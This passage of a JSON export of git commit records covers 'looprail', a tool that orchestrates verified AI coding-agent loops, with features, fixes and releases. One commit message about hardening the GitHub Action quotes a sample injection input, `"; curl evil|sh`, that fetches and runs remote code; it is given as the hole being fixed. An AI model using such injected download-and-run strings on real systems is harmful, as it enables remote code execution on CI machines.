"is_coding_agent": false
},
{
"oid": "63f034df7a2ad1937b21e8b1c420544041e2733d",
"body": "benchmarks/efficiency/: one command (run.sh) prices the 0.6.0 efficiency\nwork (lineage-scoped feedback, within-run cache, incremental executors)\nby running the SAME two-branch seeded task on looprail@0.5.0 vs this\ncheckout with real agents.\n\n- seed.sh: naive slugify vs strict edge-case suite (diacri\n[…]\n run's own journal; billed = node_end with nonzero cost, which cleanly\n excludes cache-served nodes (both costs zeroed) and agent-less testers\n- never touched by npm test - deliberate, human-run only",
"is_bot": false,
"headline": "feat(bench): EFF-7 real-dollar engine-version A/B harness",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T23:45:36Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "b7e6d97e21ed72f620482604daa8a3398f9bdfeb",
"body": "…ramps\n\n- README: `npx skills add saimeda32/looprail` is now the primary install\n path for the bundled agent skill (works across Claude Code, Cursor,\n Codex); manual copy stays as fallback\n- SKILL.md: teach demo/templates/run --dry-run and probe panels\n- New CI guard (src/config/skill-doc.test.ts)\n[…]\n\n requires must be present, every `looprail <cmd>` the skill names must\n exist in the CLI, and the current on-ramps must be covered - a skill\n naming a removed command would walk agents into errors",
"is_bot": false,
"headline": "feat(skills): skills-CLI install path + refresh skill for current on-…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T23:28:20Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "a610970eec9eea4c8a62b7bff9648dd2be40cd86",
"body": "…erification\n\nprobe: true on a panel node (all-pass policy only): clone 1 runs first as\nthe probe leader; if it FAILS, the remaining clones are skipped, since the\niteration's aggregate is already determined - their verdicts could not\nchange the iterate/stop decision. The pass path is never thinned: \n[…]\ncs/superpowers/specs/2026-07-07-probe-panels-design.md\n\nThis is the safe form of EFF-5; the rejected form (skip the critic when\ntests pass) traded away the verification guarantee and remains rejected.",
"is_bot": false,
"headline": "feat(engine): probe panels - adaptive panel depth without weakening v…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T23:23:52Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "ac7b0b12b7732e75887a792aae295b8169040f35",
"body": "When no loopfile is found, the error now surfaces all three on-ramps:\n`looprail init` to scaffold, `looprail templates` to browse shapes, and\n`looprail demo` to watch a loop run first.",
"is_bot": false,
"headline": "feat(run): empty-state points at templates and demo, not just init",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T22:53:21Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "aa5dbe1d81a97be030a92fc31d7f59909b935a1f",
"body": "The picker listed bare names; each choice now reads \"name - description\"\nso the pick is informed. Enriched label is mapped back to the template\nname after selection. Adds an init-cmd test asserting the picker choices\ncarry descriptions.",
"is_bot": false,
"headline": "feat(init): show template descriptions in the interactive picker",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T22:50:10Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "ca5e0bbe46fb48ff63f1985aa3c54793afe322e4",
"body": "Lists every built-in template with its description and the agent roles it\nwires (marking the independent reviewer), so a user can find and pick a\ntemplate without stepping through interactive init. --json emits a\nmachine-readable catalog. New src/cli/templates-cmd.ts\n(templateCatalog/renderTemplateList/templatesAction) with unit tests;\nregistered in the CLI and documented in the README command table.",
"is_bot": false,
"headline": "feat(cli): looprail templates - discover built-in loop shapes",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T22:47:14Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "184798915ced498e72d5a2248b477101e4b42181",
"body": "Version bump + CHANGELOG.",
"is_bot": false,
"headline": "chore(release): 0.6.2 - looprail run --dry-run",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T22:40:24Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "bf7474bca2d1421e9ced4f83f244013de8b5e1f4",
"body": "Load + lint the loopfile, then print the dependency-ordered node groups,\neach step's resolved adapter/model, and the budget ceiling - and exit 0.\nInvokes no agent and creates no run directory. Runs before the\nagent-availability preflight so a preview works while authoring a loopfile\non a machine without the CLIs installed. --json emits the plan\nstructurally. New src/cli/dry-run.ts (previewRun/renderPreview) with unit\ntests + two run-cmd integration tests (asserting no run dir is created).",
"is_bot": false,
"headline": "feat(run): --dry-run prints the execution plan without spending",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T22:36:20Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "64b754c9608034553007e37cb15fde2102b9656e",
"body": "Plus a doctor hint pointing at `looprail demo` when no agent CLI is\ninstalled. CHANGELOG + version bump.",
"is_bot": false,
"headline": "chore(release): 0.6.1 - demo, preflight, robust verdicts, L010",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T21:09:05Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "b27835f7c4e67cbe3a17c02673858ed1bbd44f3d",
"body": "…rifies\n\nL001 catches a loop with NO verifier at all, but a loop can pass L001\nwith a tester/critic on one branch while silently leaving another\nexecutor's output unchecked - it \"verifies\" while shipping unverified\nwork, the exact failure looprail exists to prevent. L010 flags any\nexecutor none of w\n[…]\nhe plan, not the built work; synthesizers are not\nflagged (a panel-fed merge is a legitimate unreviewed terminal). All 11\nshipped examples stay lint-clean, confirming no false positives on real\nloops.",
"is_bot": false,
"headline": "feat(lint): L010 - warn when an executor's work nothing downstream ve…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T20:56:14Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "fb07622337f424f4afece1641646ef9f4e6de51b",
"body": "… CLI is missing\n\nA loop whose later node uses a not-installed / not-logged-in adapter\nused to run (and bill) its earlier nodes first, then die mid-run with a\nraw \"command not found\" - money and time spent to reach a failure a\none-line check catches up front. runAction now verifies every adapter\nthe\n[…]\nock/shell are always fine. Skipped when\nthe caller injects its own registry (tests/embedders opting out of\nreal-CLI resolution). preflightAdapters is exported and unit-tested\nacross all four branches.",
"is_bot": false,
"headline": "feat(cli): preflight adapter check - fail before spending if an agent…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T20:40:24Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "50fd71a6b957ad3acb421c7925ac9632ba7f8367",
"body": "…ling text\n\nA critic's verdict block is rarely byte-perfect: models bold it\n(**VERDICT: pass**), prefix it (## VERDICT, > VERDICT, - VERDICT), add a\ntrailing period, or continue on the same line (VERDICT: fail - the diff\ndropped an assertion). The strict ^VERDICT:...$ anchor rejected all of\nthose an\n[…]\nand takes the LAST verdict line since\nthe critic is told to conclude with it. Same leniency for SCORE/EVIDENCE.\nBoth an accuracy win (fewer misreads) and an efficiency one (fewer\nwasted re-ask calls).",
"is_bot": false,
"headline": "fix(core): robust verdict parsing - tolerate markdown, prefixes, trai…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T20:19:53Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "324d4c6def609f8068cf8f805909b5c9588a73b1",
"body": "The biggest barrier to trying looprail was \"install agent CLIs, log them\nin, write a loopfile\" before seeing anything work. `looprail demo` runs\nthe entire loop - plan -> build -> a REAL tester -> an independent\ncritic -> verified - end to end on the built-in mock adapter, in a\nthrowaway temp dir, offline and instant. Nothing is written to the\nuser's project and no model is called; it's the 30-second \"so THAT's\nwhat it does\" before anyone commits to setup. README quickstart now\nleads with it.",
"is_bot": false,
"headline": "feat(cli): looprail demo - a full verified loop in seconds, no API key",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T20:06:34Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "140317fe16d64d9d7106d6167275b809c5540219",
"body": "CHANGELOG + README positioning (looprail as the enforcement layer under\nskill packs; the one orchestrator that mixes vendors), BENCHMARKS\nefficiency section documenting the unit-proven engine savings, version\nbump to 0.6.0.",
"is_bot": false,
"headline": "chore(release): 0.6.0 - multi-provider moat + efficiency pass",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T19:42:25Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "3a946d056ae3b236ee996215547dcb6959e74b35",
"body": "looprail wraps CLIs, so token-level caching belongs to a proxy, not to\nlooprail. AgentDef now accepts env: threaded through AgentRequest to the\nsubprocess (merged over the inherited environment via execa's extendEnv),\nso a single agent's CLI can be pointed at a per-provider caching/\noptimizing proxy\n[…]\nother goes direct - no\nglobal env change. README documents the pattern and notes that the\nengine-level savings (within-run cache, lineage-scoped re-runs,\nincremental executor) compound with any proxy.",
"is_bot": false,
"headline": "feat(adapters): per-agent env for caching-proxy passthrough",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T19:14:12Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "20558ee6372beb48e4011ec604b13b2e7b5bd1d4",
"body": "…rinding to the rail\n\nStall detection was opt-in (only fired when stall_after was set); an\nunconfigured loop that produced the same failure every iteration ground\nall the way to the iteration/wall rail, burning the whole budget - the\nexact waste seen when a loop chased an unfixable failure.\n\nrouteIt\n[…]\n and\nkeeps iterating - only the exact same failure recurring is a plateau.\nAn explicit stall_after still governs (replan-then-halt) when set; the\nbreaker is the floor for loops that configure neither.",
"is_bot": false,
"headline": "feat(engine): convergence breaker halts a plateaued loop instead of g…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T18:16:25Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "9c8d7c8b07050296ac734f5f3ab3fd1969d69479",
"body": "… of rebuilding\n\nA re-running executor rebuilt its whole artifact from the goal every\niteration - caught live, ~741 lines re-emitted to fix one failing test.\nIt now receives its own previous output as a \"# Your previous attempt\"\nsection with a minimal-change instruction, so it patches forward.\n\nGate\n[…]\n\nfrom the original run's cached entry, and cache-MISS (a real resume\nregression this surfaced, fixed here: the plateaued-replay cache test\nnow reconstructs priorOutputs exactly as a real resume does).",
"is_bot": false,
"headline": "perf(engine): re-running executors revise their prior attempt instead…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T17:58:46Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "9655c516e709ec3dd89b464da8fdcd0e9de84108",
"body": "…t branches stop re-running\n\nThe loop restarted from the beginning every iteration: state.feedback was\nrun-GLOBAL (composeFeedback concatenated every failing verdict), and\ncontext.ts injected that one blob into EVERY node's prompt - so one\nbranch failing changed every node's prompt and forced the wh\n[…]\n input must re-run).\n\nProven by a two-branch test: when branch A's critic fails, A re-runs and\nbranch B is served from cache exactly once (the mock has a single B step;\nre-running B would exhaust it).",
"is_bot": false,
"headline": "perf(engine): lineage-scoped feedback + within-run cache - independen…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T17:23:49Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "1cec2664bc5a76f1404fc756fcf5a728bd626b30",
"body": "…ilures\n\nReal halt caught live during benchmarking: a loop iterated to its wall\n(~$11.50 wasted) chasing a package.json `test: \"node --test test/\"`\nthat failed every run with \"Cannot find module .../test\". The app was\ncorrect; only the test COMMAND was broken - but a non-zero exit read as\na failing \n[…]\ninstead of a fail the loop would iterate\nagainst. A genuine assertion failure (tests ran, some asserted false)\nstays a fail. Conservative matching: only unambiguous \"could not run\"\nsignatures qualify.",
"is_bot": false,
"headline": "fix(engine): tester infra failures halt as config: errors, not app fa…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T16:57:41Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "e45067c5610b1bfcac011c1f41ceb19fa2ffc942",
"body": null,
"is_bot": false,
"headline": "Merge branch 'worktree-agent-a3cf7ed5b41335899'",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T02:39:04Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "c3098afe7f01d2eb59dc09c1be5e4ecde4f17c73",
"body": null,
"is_bot": false,
"headline": "Merge branch 'worktree-agent-ac45b12ed3344fa04'",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T02:38:44Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "400bbd409e33b2c4a05c0d97fa0c0588be38d9c5",
"body": null,
"is_bot": false,
"headline": "Merge branch 'worktree-agent-adcb801e47cf1ac78'",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T02:38:32Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "505749771e47e5b0ce6ad7704c814b01e6e0cf79",
"body": null,
"is_bot": false,
"headline": "Merge branch 'worktree-agent-ae02d664cb488d891'",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T02:38:14Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "b47d3e09193d532873b9a2b3c64269ca36d98e54",
"body": "The streaming panel pinned to the FIRST running node and never\nadvanced as the graph progressed - \"streaming text doesn't change as\nwe move through the graph\" (live-caught). It now auto-follows the\nmost-recently-started running node (the frontier) while unpinned, and\nan explicit tab click pins it there until that node finishes.",
"is_bot": false,
"headline": "fix(dashboard): live-output panel auto-follows the graph frontier",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T02:37:47Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "11b802b6f4548ef518133002b8f19fc99044dc08",
"body": "…ge index",
"is_bot": false,
"headline": "chore(api): export the gemini/opencode/ollama adapters from the packa…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T02:36:12Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "3552aeadd4492b5dc5e0321dd9f7bdd0b5fbe7cc",
"body": "… ring; review edges distinct\n\nThe DAG was a status-only display - every other answer (cost, time,\ntokens, iteration history) required a click into the inspector. Now:\n\n- Each node plate shows cost / elapsed (live-ticking on running nodes,\n from its own stream timestamps) / tokens inline, and a row\n[…]\n reviews Y\" hover;\n sequence (after:) edges keep the solid \"X runs after Y\" - the edge\n kind now rides as a third tuple element from the view model\n (layout code is unaffected; it indexes [0]/[1]).",
"is_bot": false,
"headline": "feat(dashboard): graph nodes carry telemetry, attempt pips, selection…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T02:35:36Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "1b8865eb699adb6319be707566947367de8564db",
"body": "…s the shell workaround",
"is_bot": false,
"headline": "feat(adapters): first-class ollama adapter for local models - replace…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T02:33:18Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "f3e0d5b86e32ed6f85209a5254f0d56dd061c8f7",
"body": "The static tier map in templates.ts (tierToModel) is the only model\nknowledge looprail ships, and it rots the moment any vendor rotates a\ncatalog. Every agent CLI already knows its own catalog better than we\never will, so ask the CLI itself and say so per row: source \"live\"\nmeans enumerated just now\n[…]\nctor must never hang on a CLI\nwaiting for a TTY or a daemon that is down. Missing CLIs are skipped\nwith the same fix-hint messaging doctor already uses, and --json emits\nthe full listings for scripts.",
"is_bot": false,
"headline": "feat(doctor): --models lists what each installed CLI can actually run",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T02:32:52Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "6975cd3e6a23f7a131d26c8a85b38928186d5284",
"body": "…finish cost/tokens",
"is_bot": false,
"headline": "feat(adapters): opencode adapter - JSON event parsing with real step-…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T02:30:23Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "50c7ca0abb4f10c28e54163883a4c3808c2d74cc",
"body": "…resets, pricing-estimated cost",
"is_bot": false,
"headline": "feat(adapters): gemini adapter - stream-json parsing, approval-mode p…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T02:27:55Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "3a9202f9f5014f03831857d12a457d6dff8e1a35",
"body": "…rottled node to a different agent\n\nA provider's 429/quota ceiling is transient at the PROVIDER, not in this\nprocess: it rarely clears within one 1s/4s backoff window, so an overnight\nrun whose only agent got throttled used to spend its retry budget against\nthe same per-account ceiling and then fail\n[…]\node_end event's own\n agent over the loopfile's node.agent, so cost follows the agent that\n spent it, not the one that was asked first.\n- README: Rate-limit failover subsection next to Mixing models.",
"is_bot": false,
"headline": "feat(engine): rate-limit failover - agents.<name>.fallback hands a th…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T02:27:46Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "95f63e5b5ae5ff4968af550abec799b127bc1fbe",
"body": "looprail route generates adapter/model variants of the repo's own\nloopfile (one per installed provider plus each claude-code tier,\ncross-model critic pairing when a second provider exists), runs each\nthrough runBench one config at a time so the total --max-cost-usd\nbudget can stop further launches b\n[…]\nirst then cheapest. The winner's agent map lands in\n.looprail/routing.json for downstream tooling; --json prints the same\nobject. Real paid loops, so the command confirms before spending\nunless --yes.",
"is_bot": false,
"headline": "feat(route): per-repo empirical model routing over the bench machinery",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T02:24:50Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "bcb5424e65457b8a8cf2461b689592399c12797e",
"body": "Clicking a session tile silently copied a resume command to the\nclipboard - which read as the tile doing nothing (live-caught). Tiles\nnow show a two-line \"what is this session about\" summary (claude-code:\nthe first user prompt or session summary from the transcript head,\n32KB max; copilot: the session's own recorded goal from\nworkspace.yaml) and expand on click to the full session id, workspace\npath, and an explicit copy-resume-command button.",
"is_bot": false,
"headline": "feat(dashboard): session tiles expand to real detail with a summary line",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T02:09:09Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "b8749658ea5ac5a4024689fd6f08d84a485ed911",
"body": "…rheads included",
"is_bot": false,
"headline": "docs: consolidated benchmark report - four cases, honest ties and ove…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T01:35:35Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "5d7204dca1101c23848855d67cd59df2af11791c",
"body": "Real bug caught live during the queue benchmark: a queue item started\nfrom `file: ship-check.yaml` parked at its gate; resuming it with no\n--file re-read the workspace's default looprail.yaml and silently\ncontinued the parked run with a COMPLETELY DIFFERENT graph - executing\n(and billing) the wrong \n[…]\n loopfile persistence falls back to the workspace default.\nRegression test proves a parked non-default-loopfile run resumes with\nITS graph, gate re-asked, executor served from cache, no agent invoked.",
"is_bot": false,
"headline": "fix(cli): resume continues the loopfile the run was STARTED from",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T01:34:48Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "e8f91854403a7a629a78d603eff19690b5153f70",
"body": "…ard anatomy, instrument strip\n\nFree-hand visual overhaul driven by a live complaint (\"boxes are very\nrandom... time in one row, no gap, vs second row\"): the stat line was\nunlabeled figures flex-wrapping differently on every card, so the whole\nboard read as a pile.\n\n- Card anatomy is now identical s\n[…]\nuccess. Gate timers are now ref'd\n(they are legitimate pending work, cleared the moment the gate\nsettles). Verified: the same headless queue item now parks and the\ntriage table reports it with exit 2.",
"is_bot": false,
"headline": "feat(dashboard): mission control redesign - three-tier board, fixed c…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T01:23:05Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "00bdac18841b5b79af788956579c315d376fe2df",
"body": "…istory cap\n\n\"Recent Claude Code activity\" undersold every mixed setup on a\nvendor-neutral tool. Session discovery now covers all four supported\nagent CLIs, each with its own store layout (verified against the real\nstores on disk, filenames/headers/mtimes only - transcript content\nstays unread):\n - \n[…]\n one useful action for a session looprail\ndoesn't own. And the history wall is capped at two rows with a\n\"Show all N runs\" expander (audit MC-6): fifty uniform finished tiles\nno longer drown the page.",
"is_bot": false,
"headline": "feat(dashboard): multi-tool agent activity + click-to-copy resume + h…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T01:00:53Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "af3ead0a6d69e6a8303b3e8bdb8e51d6fa5f865a",
"body": "…dit MC-5, MC-8)\n\nThe mission-control aggregate cost now wears a ~ prefix whenever any\npart of the figure is estimate-derived - a bare \"$14.34\" where most is\ntoken-derived estimate read as billed truth. All-real totals keep the\nplain $. The Claude Code sessions section collapses to one summary\nline (a third of the page went to truncated-id cards with one fact\neach); open it when you actually want them.",
"is_bot": false,
"headline": "feat(dashboard): honest aggregate labeling + sessions collapse (UX au…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T00:46:40Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "324da8be8423a3d3b8476f95ca5d0a77d0c63d58",
"body": "… fixes 4-6)\n\n- Clicking a DAG node now renders its output/verdict history in an\n inspector INSIDE the live pane, right next to the graph - the pane\n that previously sat empty on finished runs - with a titled header and\n a close affordance restoring the hint. The page-bottom \"Selected\n node\" sec\n[…]\n report rows (a gate, a parked wait) no longer wear a red\n \"0%\" confidence badge - percent semantics belong to agent claims\n only (SR-7).\n- \"no agents recorded\" filler dropped from run cards (MC-7).",
"is_bot": false,
"headline": "feat(dashboard): node inspector beside the DAG + noise pass (UX audit…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T00:43:04Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "16869603f364428432a341c4cfc3fc977ab22c44",
"body": "…eeds-you section, one-click resume\n\nImplements fixes 1-3 + parts of 5 from docs/UX-AUDIT-2026-07.md (full\naudit method and findings there; staged every real run state and\nscreenshot-verified before and after):\n\n- parked and stale are first-class statuses. A parked run (gate timeout\n awaiting a hum\n[…]\nrride form collapsed under Advanced.\n- Honest details: the no-max wall gauge renders an empty bar (a full\n one read as budget-exhausted), and card reasons get a hover title\n for their clamped tails.",
"is_bot": false,
"headline": "feat(dashboard): triage-first UX wave 1 - parked/stale first-class, n…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-07T00:35:01Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "f31ec96501b5eb2a05f6aecbee777e3a77afd734",
"body": null,
"is_bot": false,
"headline": "chore(release): bump version to 0.5.0",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-06T23:29:40Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "3e9fb054de65fe02ed546545438b9d48577fc283",
"body": "Restraint over spectacle, within the established gold-on-dark system:\nthe gate bar rises into view (approval is the page's one dramatic\nmoment and now announces itself), meters ease to their new width\ninstead of jumping, buttons transition and press down 1px on click,\nagent-table rows and mission-control cards respond to hover (cards\nlift with a shadow), and the run panel gains subtle depth. Every new\nanimation and transition is disabled under prefers-reduced-motion.",
"is_bot": false,
"headline": "feat(dashboard): premium polish pass - motion where it means something",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-06T23:29:14Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "9704040096bf71caec6149cd8a02b0cd6f80ad4d",
"body": "…anding answer\n\nDetection (doctor) answers which adapters CAN run; it cannot answer\nwhich subscription the user WANTS to burn when several are installed.\nThe skill now makes the protocol explicit: an existing looprail.yaml's\nagents block is the user's standing answer - reuse it; with no loopfile\nand multiple adapters available, ask once before scaffolding (worker +\nthe other as independent reviewer); only a single available adapter\nneeds no question.",
"is_bot": false,
"headline": "docs(skills): provider choice is the user's call - loopfile is the st…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-06T23:23:31Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "f36fba4a4bf3b71c1569ce96e5f60926a2f50e59",
"body": "…examples\n\nAn assistant authoring a loopfile had no guidance on which model runs\nwhich role. The skill now carries the role->tier table looprail init\nitself encodes (planner/judge strong - they bound the loop's quality;\nexecutor medium - iteration + verifiers compensate, that's the cost\narbitrage; c\n[…]\n\"omit model:\nwhen unsure\" as the safe default. Tiers as the primary abstraction on\npurpose: concrete model names churn every few months, tier logic\ndoesn't, and it's the same language init prompts in.",
"is_bot": false,
"headline": "docs(skills): teach per-role model selection - tiers first, names as …",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-06T23:22:13Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "3701ad099215f1612a1421bf0e5659ce145ea405",
"body": "…reach for looprail\n\nMCP (looprail mcp) gives an assistant looprail's tools; nothing taught\nit when a task should become a verified loop in the first place. The\nbundled skill closes that discoverability gap: triggers (\"run this\nuntil it's actually done\", \"batch these overnight\", \"I want to approve\nt\n[…]\napest no, rails always).\n\nShips in the npm package (files: skills) so\n`cp -r \"$(npm root -g)/looprail/skills/looprail\" ~/.claude/skills/`\nworks from any global install; README documents it beside MCP.",
"is_bot": false,
"headline": "feat(skills): bundled Claude Code skill - teaches assistants WHEN to …",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-06T23:19:55Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "dff9fe81e55948bfa95035a59bd9544e4dcc7bb4",
"body": "…ity audit, staged migration\n\nBeyond the template mirrors, the gallery now carries complete workflows\nbuilt on the new machinery:\n\n- overnight-queue: queue.yaml with goal-only items reusing one loop\n shape plus a gated release-check that PARKS overnight instead of\n hanging - the morning-triage wor\n[…]\nmples lint test now enforces EVERY .yaml an example ships (extra\nloopfiles lint like the primary; queue.yaml must parse as a queue), and\nthe README's examples paragraph points at the workflow gallery.",
"is_bot": false,
"headline": "docs(examples): three full-workflow examples - overnight queue, secur…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-06T23:18:17Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "f70bc80d3326c1e75416b4a37ec8b0fc91eda1d6",
"body": "A run whose 7 minutes were 5 minutes of a human deciding at a gate is\nnot a slow run - misreading it as one misjudges the tool. The wall\ngauge now annotates the human share (\"· 5.0m on you\"): completed gate\nnode_start->node_end spans summed in the view-model (the same spans\nRailsGuard already exclud\n[…]\ngate via\ngateWaitingSinceTs - the client's own clock has to carry that part,\nsince no journal events flow while a gate waits. Silent under 5s so\n--yes runs and fast approvals don't grow a noise label.",
"is_bot": false,
"headline": "feat(dashboard): wall-time gauge shows the human-wait share",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-06T23:13:33Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "486596c8dd35990a0a01f78dadeb498e712f0d9f",
"body": "macOS hides overlay scrollbars until a scroll starts, so an overflowing\napproval question gave no visual hint that more content existed below\nthe fold - \"I can't scroll\" when the content was scrollable all along,\nit just didn't look like it. The box now shows a permanent, styled\nscrollbar (signal-dim thumb, thin firefox variant) whenever content\noverflows.",
"is_bot": false,
"headline": "fix(dashboard): always-visible styled scrollbar on the gate question box",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-06T23:02:21Z",
"body_truncated": false,
"is_coding_agent": false
},
{
"oid": "5978d2242b1a68f37db7e47c04eee92f61354076",
"body": "…ons, action.yml injection hardening\n\nThree live-caught issues in one pass:\n\n- Scrolling inside the approval question box silently snapped back to\n the top: render() runs on every poll tick and rewrote identical\n textContent, which replaces the child node and resets scrollTop.\n The question is no\n[…]\ny review): a crafted input like `\"; curl evil|sh`\n would execute. Inputs now reach the shell only as env vars - data,\n not code - and a test pins that no run: block ever interpolates\n inputs again.",
"is_bot": false,
"headline": "fix(dashboard,ci): gate-bar scroll persistence, grouped decision butt…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-06T22:54:14Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "5781627c51f07b5ba304c71547d9c26e5d7c97ca",
"body": "… verifies\n\naction.yml installs looprail, runs the loopfile with --json --yes (CI\nhas no human at a keyboard; gates auto-approve unless disabled), and\nexposes status/run-id/cost-usd/journal as step outputs. Exit semantics\nmatch the CLI: the step fails unless the run verified - an agent's own\n\"done\" \n[…]\n CI section with a complete workflow\nexample, and the action.yml contract is pinned by a unit test (a\nmalformed action.yml otherwise only fails at a consumer's workflow run,\nthe worst possible place).",
"is_bot": false,
"headline": "feat(ci): composite GitHub Action - the job passes only when the loop…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-06T22:46:30Z",
"body_truncated": true,
"is_coding_agent": false
},
{
"oid": "87991e4332417fda31026e22f45a3c8df3da3934",
"body": "…stion inline\n\nLive-caught UX complaint: approving a gate meant clicking the gate node\nin the DAG up top, scrolling down to hunt for content that was\nellipsis-truncated, and the Approve button itself could be entirely\noff-screen. A waiting gate is the one moment the page needs a human\naction - that \n[…]\nke).\n\nVerified live via Playwright against a real detached run: bar visible\nwith full multi-line question, Approve click resolved the gate through\nthe cross-process answer file, run finished verified.",
"is_bot": false,
"headline": "fix(dashboard): gate approval is a fixed bottom bar with the full que…",
"author_name": "saimeda32",
"author_login": "saimeda32",
"committed_at": "2026-07-06T22:39:23Z",
"body_truncated": true,
"is_coding_agent": false
},
{
